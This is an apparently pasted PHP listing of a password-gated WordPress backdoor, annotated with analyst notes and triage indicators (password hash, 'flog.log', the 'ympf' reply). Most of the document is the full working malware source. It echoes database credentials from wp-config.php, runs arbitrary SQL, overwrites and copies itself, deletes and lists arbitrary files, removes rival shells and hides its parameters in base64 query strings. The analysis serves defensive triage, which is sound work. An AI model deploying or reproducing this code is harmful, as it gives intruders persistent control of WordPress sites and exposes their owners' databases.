PalmaSolutions

sp5c1f17

Nov 2nd, 2018
  1. xjA595CIQ
  <?php
  /*
   * Analyst notes (annotation only; every statement below is as found).
   *
   * This file is a password-gated remote-administration backdoor that targets
   * WordPress installations. The request handler at the bottom merges $_GET
   * into $_POST, compares md5($_POST['password']) with CONF_PASSWORD_HASH and
   * then dispatches $_POST['action'] to the matching r_action_<name>() function.
   *
   * What the handlers can do, as visible in this listing:
   *   - read the database credentials out of wp-config.php and echo them;
   *   - run caller-supplied SQL against the WordPress database;
   *   - overwrite or copy this file, copy/delete/list caller-supplied paths;
   *   - export published posts and pages into a file next to the script.
   *
   * Artefacts worth searching for during triage (all taken from this listing):
   *   - the CONF_PASSWORD_HASH value and the VERSION string '0.2.3';
   *   - 'flog.log', written relative to the working directory (the script's
   *     directory, or the WordPress root after r_action_pages() has chdir()'d);
   *   - files created by tempnam('./', 'wp') and tempnam('./', 'ert'), plus the
   *     'wp*.php' export written by r_action_pages();
   *   - the response body 'ympf' (failed password) and the '[<{...}>]' wrapper
   *     around the 'link' response;
   *   - requests whose query string is a single base64 key with an empty value.
   *
   * If this file is found on a host, treat the database credentials in
   * wp-config.php as exposed. The $sp... identifiers appear to be
   * obfuscator-generated and carry no meaning.
   */

  // Names of the two database extensions the script can drive; they are also
  // used to build the helper function names r_<ext>_connect / r_<ext>_query.
  define('EXT_MYSQLI', 'mysqli');
  define('EXT_MYSQL', 'mysql');
  // MD5 of the operator password; the only access control in the file.
  define('CONF_PASSWORD_HASH', '76c8ed7a7925b8bce85919bb3e72b6c2');
  define('VERSION', '0.2.3');

  /**
   * Pick the database extension available on the host.
   *
   * Returns EXT_MYSQLI when the mysqli class exists, otherwise EXT_MYSQL when
   * mysql_connect() exists. Falls off the end (null) when neither is present.
   */
  function r_get_lib()
  {
      if (class_exists('mysqli')) {
          return EXT_MYSQLI;
      }
      if (function_exists('mysql_connect')) {
          return EXT_MYSQL;
      }
  }

  /**
   * Locate the WordPress root by walking up from the working directory.
   *
   * A directory counts as the root when it holds wp-config.php, index.php and
   * wp-settings.php. The walk stops without a return value once the resolved
   * path is '/'.
   */
  function r_get_config_path()
  {
      $sp5c1f17 = realpath('.');
      $spf537af = 0;
      while ($sp5c1f17 != '/') {
          if (file_exists(sprintf('%s/wp-config.php', $sp5c1f17))
              && file_exists(sprintf('%s/index.php', $sp5c1f17))
              && file_exists(sprintf('%s/wp-settings.php', $sp5c1f17))) {
              return $sp5c1f17;
          }
          // One more '../' per iteration, always resolved from the working directory.
          $spf537af++;
          $sp5c1f17 = realpath(str_repeat('../', $spf537af));
      }
  }

  /**
   * Extract the database settings from wp-config.php.
   *
   * Same upward walk as r_get_config_path(), but every directory visited is
   * appended to 'flog.log' in the working directory, which leaves a trace on
   * disk. Returns an array with host, port, db, user, pass, prefix and path.
   */
  function r_get_config()
  {
      $sp5c1f17 = realpath('.');
      $spf537af = 0;
      while ($sp5c1f17 != '/') {
          // The string literal below contains a raw newline, so its closing
          // quote has to stay at column 0.
          file_put_contents('flog.log', $sp5c1f17 . '
', FILE_APPEND);
          if (file_exists(sprintf('%s/wp-config.php', $sp5c1f17))
              && file_exists(sprintf('%s/index.php', $sp5c1f17))
              && file_exists(sprintf('%s/wp-settings.php', $sp5c1f17))) {
              $sp8ec807 = file(sprintf('%s/wp-config.php', $sp5c1f17));
              // Keep lines mentioning define or table_prefix, drop those mentioning defined.
              $sp8ec807 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $sp8ec807), PREG_GREP_INVERT);
              // Raw newline inside the literal again; closing quote at column 0.
              $sp8ec807 = implode('
', $sp8ec807);
              // Executes the filtered wp-config.php lines so that the DB_* constants
              // and $table_prefix exist in this scope.
              eval($sp8ec807);
              $sp600ca0 = 'table_prefix';
              // DB_HOST may be 'host:port'; the part after ':' defaults to 3306.
              $spd8b3be = explode(':', DB_HOST);
              $spc6c951 = array_shift($spd8b3be);
              $spffd1e3 = array_shift($spd8b3be);
              $spffd1e3 = $spffd1e3 ? $spffd1e3 : 3306;
              return array(
                  'host' => $spc6c951,
                  'port' => $spffd1e3,
                  'db' => DB_NAME,
                  'user' => DB_USER,
                  'pass' => DB_PASSWORD,
                  // Variable-variable read of $table_prefix set by the eval above.
                  'prefix' => ${$sp600ca0},
                  'path' => $sp5c1f17,
              );
              // Unreachable: follows the return.
              break;
          }
          $spf537af++;
          $sp5c1f17 = realpath(str_repeat('../', $spf537af));
      }
  }

  /**
   * Open a connection with the legacy mysql extension and select the database.
   * $sp8ec807 is the array returned by r_get_config().
   */
  function r_mysql_connect($sp8ec807)
  {
      $sp23919b = mysql_connect(sprintf('%s:%s', $sp8ec807['host'], $sp8ec807['port']), $sp8ec807['user'], $sp8ec807['pass']);
      mysql_select_db($sp8ec807['db'], $sp23919b);
      return $sp23919b;
  }

  /**
   * Open a mysqli connection from the r_get_config() array.
   *
   * A numeric 'port' is passed as the port; a non-numeric value is passed as
   * the socket argument and the port falls back to 3306.
   */
  function r_mysqli_connect($sp8ec807)
  {
      return new mysqli(
          $sp8ec807['host'],
          $sp8ec807['user'],
          $sp8ec807['pass'],
          $sp8ec807['db'],
          is_numeric($sp8ec807['port']) ? $sp8ec807['port'] : 3306,
          !is_numeric($sp8ec807['port']) ? $sp8ec807['port'] : null
      );
  }

  /**
   * Run a query through the legacy mysql extension and collect all rows.
   *
   * Each key of $sp9ba8be is replaced in the query text by its escaped value;
   * the values are escaped but not quoted here. Returns array('success' => rows)
   * or array('error' => 'errno :: message'). The first parameter is unused.
   */
  function r_mysql_query($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array())
  {
      if (!empty($sp9ba8be)) {
          foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) {
              $sp50916d = str_replace($spe4aeb1, mysql_real_escape_string($sp5be917, $sp23919b), $sp50916d);
          }
      }
      $sp321ed1 = array();
      $spf5d314 = mysql_query($sp50916d, $sp23919b);
      if ($spf5d314) {
          while ($sp595910 = mysql_fetch_assoc($spf5d314)) {
              $sp321ed1[] = $sp595910;
          }
          return array('success' => $sp321ed1);
      } else {
          return array('error' => sprintf('%s :: %s', mysql_errno($sp23919b), mysql_error($sp23919b)));
      }
  }

  /**
   * mysqli counterpart of r_mysql_query().
   *
   * Returns array('success' => rows) for a result set, array('success' => true)
   * for a statement that succeeded without one, otherwise array('error' => ...).
   */
  function r_mysqli_query($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array())
  {
      if (!empty($sp9ba8be)) {
          foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) {
              $sp50916d = str_replace($spe4aeb1, $sp23919b->real_escape_string($sp5be917), $sp50916d);
          }
      }
      $spf5d314 = $sp23919b->query($sp50916d);
      if (is_object($spf5d314)) {
          $sp321ed1 = array();
          while ($sp595910 = $spf5d314->fetch_assoc()) {
              $sp321ed1[] = $sp595910;
          }
          return array('success' => $sp321ed1);
      }
      if ($spf5d314) {
          return array('success' => true);
      } else {
          return array('error' => sprintf('%s :: %s', $sp23919b->errno, $sp23919b->error));
      }
  }

  /**
   * Like r_mysql_query(), but returns the raw result so that the caller can
   * fetch rows one at a time with r_mysql_query_row().
   */
  function r_mysql_query_res($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array())
  {
      if (!empty($sp9ba8be)) {
          foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) {
              $sp50916d = str_replace($spe4aeb1, mysql_real_escape_string($sp5be917, $sp23919b), $sp50916d);
          }
      }
      // Assigned but never used in this function.
      $sp321ed1 = array();
      $spf5d314 = mysql_query($sp50916d, $sp23919b);
      return $spf5d314;
  }

  /** Fetch the next row from a legacy mysql result, or false when the result is falsy. */
  function r_mysql_query_row($spf5d314)
  {
      if ($spf5d314) {
          return mysql_fetch_assoc($spf5d314);
      } else {
          return false;
      }
  }

  /** mysqli counterpart of r_mysql_query_res(): substitute binds, return the raw result. */
  function r_mysqli_query_res($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array())
  {
      if (!empty($sp9ba8be)) {
          foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) {
              $sp50916d = str_replace($spe4aeb1, $sp23919b->real_escape_string($sp5be917), $sp50916d);
          }
      }
      $spf5d314 = $sp23919b->query($sp50916d);
      return $spf5d314;
  }

  /** Fetch the next row from a mysqli result object, or false when it is not an object. */
  function r_mysqli_query_row($spf5d314)
  {
      if (is_object($spf5d314)) {
          return $spf5d314->fetch_assoc();
      } else {
          return false;
      }
  }

  /** Undo magic-quotes escaping on every top-level $_POST value when it is enabled. */
  function r_unmagic()
  {
      if (get_magic_quotes_gpc()) {
          foreach ($_POST as $spe4aeb1 => $sp5be917) {
              $_POST[$spe4aeb1] = stripslashes($sp5be917);
          }
      }
  }

  /** Action 'prefix': echo the WordPress table prefix. */
  function r_action_prefix()
  {
      $sp8ec807 = r_get_config();
      echo $sp8ec807['prefix'];
  }

  /**
   * Action 'query': run caller-supplied SQL with the site's own credentials.
   *
   * Request fields read: 'query' (SQL text), 'bind' (JSON map of placeholder to
   * value), optional 'decode' (comma-separated bind keys to base64-decode) and
   * optional 'encode' (comma-separated result columns to base64-encode).
   * The result array is echoed as JSON.
   */
  function r_action_query()
  {
      r_unmagic();
      $sp8ec807 = r_get_config();
      $spa2856c = r_get_lib();
      $sp9ba8be = json_decode($_POST['bind'], true);
      if (isset($_POST['decode'])) {
          $sp4e0de7 = array_map('trim', explode(',', $_POST['decode']));
          foreach ($sp4e0de7 as $spf99235) {
              if (isset($sp9ba8be[$spf99235])) {
                  $sp9ba8be[$spf99235] = base64_decode($sp9ba8be[$spf99235]);
              }
          }
      }
      // Helper names are built from the extension name returned by r_get_lib().
      $sp23919b = call_user_func(sprintf('r_%s_connect', $spa2856c), $sp8ec807);
      $spf5d314 = call_user_func(sprintf('r_%s_query', $spa2856c), $sp8ec807, $sp23919b, $_POST['query'], $sp9ba8be);
      if (isset($_POST['encode'])) {
          $spe614dd = array_map('trim', explode(',', $_POST['encode']));
          foreach ($spf5d314['success'] as $sp07f8b4 => $sp595910) {
              foreach ($spe614dd as $sp51752a) {
                  $spf5d314['success'][$sp07f8b4][$sp51752a] = base64_encode($spf5d314['success'][$sp07f8b4][$sp51752a]);
              }
          }
      }
      echo json_encode($spf5d314);
  }

  /**
   * Action 'update': overwrite this file with the base64-decoded 'file' field
   * and echo the MD5 of the new content. The file's hash on disk can therefore
   * change between observations.
   */
  function r_action_update()
  {
      file_put_contents(__FILE__, base64_decode($_POST['file']));
      echo md5(base64_decode($_POST['file']));
  }

  /** Action 'version': echo the VERSION constant. */
  function r_action_version()
  {
      echo VERSION;
  }

  /** Action 'duplicate': copy this file to the path in 'dst'; echoes 1 or 0. */
  function r_action_duplicate()
  {
      $sp0fa8b0 = copy(__FILE__, $_POST['dst']);
      echo (int) $sp0fa8b0;
  }

  /** Action 'copy': copy the path in 'src' to the path in 'dst'; echoes 1 or 0. */
  function r_action_copy()
  {
      $sp0fa8b0 = copy($_POST['src'], $_POST['dst']);
      echo (int) $sp0fa8b0;
  }

  /**
   * Action 'dir': list the directory named in 'dir' and echo the entries as
   * JSON, each with its type, name, joined path and resolved path.
   */
  function r_action_dir()
  {
      $sp0fa8b0 = array();
      $spf99235 = dir($_POST['dir']);
      while (false !== ($spddc949 = $spf99235->read())) {
          $space1b9 = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $spddc949);
          $sp0fa8b0[] = array(
              'type' => is_file($space1b9) ? 'file' : (is_dir($space1b9) ? 'dir' : 'unknown'),
              'entry' => $spddc949,
              'full_entry' => $space1b9,
              'realpath' => realpath($space1b9),
          );
      }
      $spf99235->close();
      echo json_encode($sp0fa8b0);
  }

  /**
   * Action 'wpversion': echo the installed WordPress version.
   *
   * Scans wp-settings.php for the define() that mentions WPINC, strips the
   * quotes from its arguments, requires version.php from that directory and
   * echoes $wp_version. Echoes 'error' when no such define is found.
   */
  function r_action_wpversion()
  {
      $sp5c1f17 = r_get_config_path();
      $spdb7e52 = file_get_contents(sprintf('%s/wp-settings.php', $sp5c1f17));
      preg_match_all('/define\\(([^\\)]+)/i', $spdb7e52, $sp2b94d9);
      foreach ($sp2b94d9[1] as $sp8781b4) {
          if (strpos($sp8781b4, 'WPINC') !== false) {
              $sp8781b4 = array_map('trim', explode(',', $sp8781b4));
              foreach ($sp8781b4 as $spbbf321 => $sp0f55e2) {
                  // Same first and last character: treated as a quoted string and unwrapped.
                  if ($sp0f55e2[0] == $sp0f55e2[strlen($sp0f55e2) - 1]) {
                      $sp8781b4[$spbbf321] = substr($sp0f55e2, 1, strlen($sp0f55e2) - 2);
                  }
              }
              require_once $sp863dc0 = sprintf('%s%s%s%sversion.php', $sp5c1f17, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $sp8781b4[1]), DIRECTORY_SEPARATOR);
              $sp520cb8 = 'wp_version';
              echo ${$sp520cb8};
              die;
          }
      }
      echo 'error';
  }

  /**
   * Action 'w3tc': delete the cached copies of the page named in 'url' under
   * wp-content/cache/page_enhanced/ (_index.html and _index.html_gzip).
   * The scheme is stripped from 'url'; nothing else is validated before the
   * value is placed in the path.
   */
  function r_action_w3tc()
  {
      $sp5c1f17 = r_get_config_path();
      $spc0fe89 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/');
      $spcd3e69 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      $spcd3e69 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      echo 'success';
  }

  /**
   * Action 'cenabler': same as r_action_w3tc() for wp-content/cache/cache-enabler/
   * (index.html, index.html.gz, index-webp.html, index-webp.html.gz).
   */
  function r_action_cenabler()
  {
      $sp5c1f17 = r_get_config_path();
      $spc0fe89 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/');
      $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp5c1f17, $spc0fe89);
      if (file_exists($spcd3e69)) {
          unlink($spcd3e69);
      }
      echo 'success';
  }

  /**
   * Action 'removeshell': delete the file at DOCUMENT_ROOT + 'shell_url' unless
   * it is this file. Echoes 'success', 'fail' or 'ignore' (path did not exist).
   */
  function r_action_removeshell()
  {
      if (file_exists($spfccd78 = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) {
          if ($spfccd78 != __FILE__) {
              unlink($spfccd78);
          }
          echo file_exists($spfccd78) ? 'fail' : 'success';
      } else {
          echo 'ignore';
      }
  }

  /**
   * Action 'remove': delete the path in 'file' unless it equals __FILE__.
   * Echoes 'success', 'fail' or 'ignore' (path did not exist).
   */
  function r_action_remove()
  {
      if (file_exists($_POST['file'])) {
          if ($_POST['file'] != __FILE__) {
              unlink($_POST['file']);
          }
          echo file_exists($_POST['file']) ? 'fail' : 'success';
      } else {
          echo 'ignore';
      }
  }

  /**
   * Action 'pages': export published posts and pages to a file on disk.
   *
   * Creates a temp name with prefix 'wp' under './' and opens '<name>.php' for
   * writing, loads WordPress, selects rows with ID > 'remote_id' (paged by
   * 'batch_start' and 'batch_size') and writes one CSV row per post: ID, then
   * base64 of content, title and permalink. Echoes the export file's path.
   * tempnam() itself creates a file, so both '<name>' and '<name>.php' remain.
   */
  function r_action_pages()
  {
      $sp580171 = tempnam('./', 'wp') . '.php';
      $sp69793a = fopen($sp580171, 'w');
      $sp5c1f17 = r_get_config_path();
      chdir($sp5c1f17);
      // Assigned but not read again in this function.
      $sp960dd1 = $_POST['id'];
      require $sp5c1f17 . '/wp-load.php';
      r_unmagic();
      $sp8ec807 = r_get_config();
      $spa2856c = r_get_lib();
      $sp52d344 = $sp8ec807['prefix'];
      $sp23919b = call_user_func(sprintf('r_%s_connect', $spa2856c), $sp8ec807);
      // The three request values are formatted into the SQL text as-is; no bind map is passed.
      $spf5d314 = call_user_func(sprintf('r_%s_query_res', $spa2856c), $sp8ec807, $sp23919b, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $sp52d344, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size']));
      while ($sp595910 = call_user_func(sprintf('r_%s_query_row', $spa2856c), $spf5d314)) {
          fputcsv($sp69793a, array($sp595910['ID'], base64_encode($sp595910['post_content']), base64_encode($sp595910['post_title']), base64_encode(get_permalink($sp595910['ID']))));
      }
      fclose($sp69793a);
      echo $sp580171;
  }

  /** Action 'config': echo the r_get_config() array, database password included, as JSON. */
  function r_action_config()
  {
      echo json_encode(r_get_config());
  }

  /** Action 'getlib': echo the database extension name chosen by r_get_lib(). */
  function r_action_getlib()
  {
      echo r_get_lib();
  }

  /** Action 'magic': echo 'Yes' or 'No' depending on get_magic_quotes_gpc(). */
  function r_action_magic()
  {
      echo get_magic_quotes_gpc() ? 'Yes' : 'No';
  }

  /**
   * Action 'loginurl': fetch a sibling URL over HTTP and echo the response.
   *
   * Rebuilds the current request URL, swaps this script's basename at the end
   * of it for the basename of tempnam('./', 'ert') . '.php', and requests that
   * URL with file_get_contents(). Nothing in this listing writes the '.php'
   * file, so the purpose cannot be confirmed from here; the 'ert*' file that
   * tempnam() creates is left on disk.
   */
  function r_action_loginurl()
  {
      $sp2b6a6c = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
      $sp450100 = $sp2b6a6c;
      $sp93cbf8 = basename(__FILE__);
      $sp580171 = basename(tempnam('./', 'ert') . '.php');
      $sp5967fa = preg_replace(sprintf('/%s$/i', preg_quote($sp93cbf8)), $sp580171, $sp450100);
      echo file_get_contents($sp5967fa);
  }

  // ---- Request handling -------------------------------------------------------

  // A query string made of one key with an empty value is treated as a
  // base64-encoded parameter string and replaces $_GET, which keeps parameter
  // names and values out of plain sight in access logs.
  if (count($_GET) == 1 && !trim($sp862b54 = array_pop(array_values($_GET)))) {
      $spf5d314 = array();
      parse_str(base64_decode(array_shift(array_keys($_GET))), $spf5d314);
      $_GET = $spf5d314;
  }
  // GET values override POST values of the same name.
  $_POST = array_merge($_POST, $_GET);
  // Single shared password, checked as an unsalted MD5 with a loose comparison.
  if (CONF_PASSWORD_HASH == md5($_POST['password'])) {
      switch ($_POST['action']) {
          case 'link':
              // Load WordPress and echo the permalink of post 'id' inside '[<{' ... '}>]'.
              $sp5c1f17 = r_get_config_path();
              chdir($sp5c1f17);
              $sp960dd1 = $_POST['id'];
              require_once $sp5c1f17 . '/wp-load.php';
              $sp32e67c = get_permalink($_POST['id']);
              echo sprintf('[<{%s}>]', $sp32e67c);
              break;
          default:
              // Any other action name is mapped to r_action_<name>() and called.
              $spb04a86 = sprintf('r_action_%s', $_POST['action']);
              call_user_func($spb04a86);
              break;
      }
  } else {
      // Fixed reply on a wrong or missing password.
      die('ympf');
  }